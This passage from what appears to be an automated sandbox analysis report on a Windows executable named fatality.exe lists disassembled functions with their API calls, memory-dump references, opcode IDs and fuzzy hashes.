                                                                    • Instruction Fuzzy Hash: A301F53368521CBED2105F769D09FB67B5FEB9BB01F228110F345F2090C6A29A098779
                                                                    Function 00E02BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer$_abort
                                                                    • String ID:
                                                                    • API String ID: 2252061734-0
                                                                    • Opcode ID: 19fe16a271ff3a2d59e312e1a42151659b55313694440ade56bf5da1ce59181c
                                                                    • Instruction ID: 0bd0cc3a7e18de9e97b852abcfe64b5e044115614e0e358e085697aa77ad4b18
                                                                    • Opcode Fuzzy Hash: 19fe16a271ff3a2d59e312e1a42151659b55313694440ade56bf5da1ce59181c
                                                                    • Instruction Fuzzy Hash: 5251E171600212AFEB298F54D889BAAB3E4FF54314F24552EEE05A76E1E731EDC0D790
                                                                    Function 00E0C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E0C817
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E0C829
                                                                    • _free.LIBCMT ref: 00E0C83B
                                                                    • _free.LIBCMT ref: 00E0C84D
                                                                    • _free.LIBCMT ref: 00E0C85F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 6c4685b755fbfd723c08cfe72b54721de38992a7d7e7f0dd1a2d1aa4a89bfaea
                                                                    • Instruction ID: df085ee7ce6991286c2c4fd329a242fb1828b0531f2ce45449627ff54df21fa0
                                                                    • Opcode Fuzzy Hash: 6c4685b755fbfd723c08cfe72b54721de38992a7d7e7f0dd1a2d1aa4a89bfaea
                                                                    • Instruction Fuzzy Hash: 66F04F32510202AFC624DF69F585C4A77EDAB00718764B919F548F76D2CA70FCC08A68
                                                                    Function 00E08900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E0891E
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E08930
                                                                    • _free.LIBCMT ref: 00E08943
                                                                    • _free.LIBCMT ref: 00E08954
                                                                    • _free.LIBCMT ref: 00E08965
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 98e1138b2a5a599d3b91bf84531c5f1870ce7ce95f8156622fb6b2721b5e2e6f
                                                                    • Instruction ID: 2bbf2e70f1f2c8942662c547af32cbd523ee83b95c67cf210964116fac4962a6
                                                                    • Opcode Fuzzy Hash: 98e1138b2a5a599d3b91bf84531c5f1870ce7ce95f8156622fb6b2721b5e2e6f
                                                                    • Instruction Fuzzy Hash: 8FF03A798201238FC6066F16FE024453FE5F726714381274AFA59723F1CB71498A9B85
                                                                    Function 00DFA80C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DFA699: GetDC.USER32(00000000), ref: 00DFA69D
                                                                      • Part of subcall function 00DFA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFA6A8
                                                                      • Part of subcall function 00DFA699: ReleaseDC.USER32(00000000,00000000), ref: 00DFA6B3
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00DFA83C
                                                                      • Part of subcall function 00DFAAC9: GetDC.USER32(00000000), ref: 00DFAAD2
                                                                      • Part of subcall function 00DFAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00DFAB01
                                                                      • Part of subcall function 00DFAAC9: ReleaseDC.USER32(00000000,?), ref: 00DFAB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectRelease$CapsDevice
                                                                    • String ID: ($lU
                                                                    • API String ID: 1061551593-690053282
                                                                    • Opcode ID: 5ec5392b172e4392d693a300ff08c9be797ef07210a6f3b1ba5e0063af0c05bb
                                                                    • Instruction ID: b5e95c13de4512a03588edba774d4c7d17deeb7475af75d0f1503e1075f8159d
                                                                    • Opcode Fuzzy Hash: 5ec5392b172e4392d693a300ff08c9be797ef07210a6f3b1ba5e0063af0c05bb
                                                                    • Instruction Fuzzy Hash: 6191F3B5604354AFD710DF29C84496BBBE8FFC9700F01891EF59AD3260DB70A94ACB62
                                                                    Function 00DEBB03 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: UNC$\\?\
                                                                    • API String ID: 176396367-253988292
                                                                    • Opcode ID: 604a40462433e3e57aae342175353ac5c3e3bfcc652ca7e63aecae13689a4f4c
                                                                    • Instruction ID: 689800209c7133554d8664a83537fda8578e2cf354630ccf80866616b982e78f
                                                                    • Opcode Fuzzy Hash: 604a40462433e3e57aae342175353ac5c3e3bfcc652ca7e63aecae13689a4f4c
                                                                    • Instruction Fuzzy Hash: C741C531404299A6CF21BF72CC01EEB77A9EF41364F248567F554B3151DBB0FA908AB0
                                                                    Function 00E07F6E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: (!$C:\Users\user\Desktop\fatality.exe
                                                                    • API String ID: 269201875-2171620144
                                                                    • Opcode ID: b1839ba62668b6526820baada1d25b814b285da384cfdf800d4ce28b255efa8f
                                                                    • Instruction ID: 9ab0ae0e3e84011d92cad803d5f6c8b3235a9ea42f370f6e8bdf3aaf907a41fa
                                                                    • Opcode Fuzzy Hash: b1839ba62668b6526820baada1d25b814b285da384cfdf800d4ce28b255efa8f
                                                                    • Instruction Fuzzy Hash: 4F31E270A00209AFDB21DF95DD8099EBBFCEF85300F1050AAF544B7291DB709E85CB60
                                                                    Function 00DFAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFAD98
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DFADAD
                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFADC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: ASKNEXTVOL
                                                                    • API String ID: 445417207-3402441367
                                                                    • Opcode ID: 230a14cdf885e906a5d9c36a751c0746fca97523978ffec9d08658cc08d8fd92
                                                                    • Instruction ID: 47bdea1366414127cf9b9a65f973ef4a8c0e22958a6cf5e736712859c8bb2d91
                                                                    • Opcode Fuzzy Hash: 230a14cdf885e906a5d9c36a751c0746fca97523978ffec9d08658cc08d8fd92
                                                                    • Instruction Fuzzy Hash: E7110372280204AFD7119FADEC44FBA7769EF4B742F164000F348EB4A0D761A94A8732
                                                                    Function 00DED91A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: __fprintf_l_strncpy
                                                                    • String ID: $%s$@%s
                                                                    • API String ID: 1857242416-834177443
                                                                    • Opcode ID: 8b9afce4902418621ba4ecc094dc26fe9d7124809048209bedf88a6e1c5736b4
                                                                    • Instruction ID: 78172a707648641db6a8f76763a95039079a2328c8078f5b3984a077c6f0046e
                                                                    • Opcode Fuzzy Hash: 8b9afce4902418621ba4ecc094dc26fe9d7124809048209bedf88a6e1c5736b4
                                                                    • Instruction Fuzzy Hash: 54018872440288AADF21FEB5CD42FEE7BA9EF01704F440011FA11A61B3E622D6559F31
                                                                    Function 00DFDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                    • API String ID: 0-56093855
                                                                    • Opcode ID: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
                                                                    • Instruction ID: 0e14b9fdc36e6b32fc8f34cddd9af2046d2453c3ff308f2447c2bdd4f2a8a953
                                                                    • Opcode Fuzzy Hash: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
                                                                    • Instruction Fuzzy Hash: DC01B57660434DAFD7206F66FD44ABA7FA7F759344B058026FA05E3270C6309859DBB0
                                                                    Function 00DFFD10 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _com_issue_error
                                                                    • String ID:
                                                                    • API String ID: 2162355165-0
                                                                    • Opcode ID: 914f5106c5f15b7b6e586eafe7fc8dc849b4f31487d49196bb8b90f131aa955d
                                                                    • Instruction ID: 6964f44153286013db817aa44cbe269f0ce2d21037d75ab06ea00be4082899e7
                                                                    • Opcode Fuzzy Hash: 914f5106c5f15b7b6e586eafe7fc8dc849b4f31487d49196bb8b90f131aa955d
                                                                    • Instruction Fuzzy Hash: 1941C371A0021DAFDB109F69DC45BBEBBA8EF48710F15C23AFA05E7291D7349A4087B4
                                                                    Function 00DE1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: 1bc610621f31a29db001ed9f9f4c8cb485de4203f0e5f8d4ac7f3c227572f8b3
                                                                    • Instruction ID: 69b06f2b4088f5d3488a4753ef5ff68ef9fc6304c5b2dfbf916930595a2c5f3a
                                                                    • Opcode Fuzzy Hash: 1bc610621f31a29db001ed9f9f4c8cb485de4203f0e5f8d4ac7f3c227572f8b3
                                                                    • Instruction Fuzzy Hash: 3841B675A006695FCB21AF79CC069EE7BBCEF01310F044119FA45F7242DB30AE598AB5
                                                                    Function 00E02AFA Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E02B16
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Value___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 1426506684-0
                                                                    • Opcode ID: 592491b79c642b8da15caf849efa9935b2894d7528600c2be25eb8855821c59e
                                                                    • Instruction ID: a2772586cd826d5278070c60aeb581a5a90e576b5b0d0d0f507bfc2ebf0fe5e7
